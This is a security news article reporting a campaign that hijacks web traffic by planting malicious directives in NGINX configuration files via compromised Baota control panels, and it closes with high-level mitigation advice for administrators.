cybersecurity researchers have uncovered an ongoing, large-scale campaign that is hijacking web traffic by compromising NGINX web servers and related management software. The campaign, which targets systems globally, aims to stealthily reroute internet traffic through infrastructure controlled by attackers, posing significant data theft and surveillance risks.

Security analysts from Datadog Security Labs first detected the activity. They reported that threat actors, some linked to the recent exploitation of a critical vulnerability known as React2Shell (CVE-2025-55182), are deploying malicious configuration files on NGINX servers. These servers are among the most popular web server platforms in the world, powering a vast portion of the internet.

Method of Compromise and Targets

The attackers are not exploiting a flaw in the NGINX software itself. Instead, they are gaining unauthorized access to servers and their control panels to insert harmful directives into the NGINX configuration files. A primary target has been the Baota panel, also known as BT, which is a widely used server management tool in some regions for simplifying the administration of services like NGINX.

Once inside a system, the attackers modify the configuration to intercept and redirect user traffic. This technique allows them to monitor, log, or manipulate data flowing between visitors and the legitimate website. The malicious code can be designed to steal login credentials, session cookies, financial information, or inject malicious content into web pages without the user’s or site owner’s knowledge.

Scale and Implications of the Hijacking

While the exact number of compromised servers is still being assessed, the campaign’s methodology suggests it has the potential to affect a wide range of websites and online services. Because NGINX is foundational to modern web infrastructure, from small blogs to large enterprise and e-commerce platforms, the impact of such traffic interception is severe.

The hijacking undermines the fundamental security and privacy expectations of internet users. It also represents a serious breach of trust for website operators, who may be unaware their server is funneling visitor data to a third party. This type of attack can be used for espionage, large-scale credential harvesting, or as a precursor to further malware distribution.

Recommended Response and Mitigation

Security firms and industry experts advise administrators of NGINX servers, particularly those using management panels like Baota, to conduct immediate audits of their systems. Key steps include reviewing all NGINX configuration files for unauthorized changes, checking server access logs for suspicious activity, and ensuring all access credentials and software are up to date with the latest security patches.

Organizations are urged to implement strong, unique passwords and multi-factor authentication for all administrative interfaces. Regular security monitoring and file integrity checks are also critical to detect unauthorized modifications promptly. The disclosure of this campaign has prompted renewed warnings about the security risks associated with internet-exposed management panels.

Looking ahead, cybersecurity teams are expected to continue analyzing the attack patterns to identify indicators of compromise and potentially link the activity to specific threat groups. Further advisories detailing technical signatures and defensive configurations for NGINX are anticipated from security vendors and national cybersecurity agencies in the coming days.

Source: Datadog Security Labs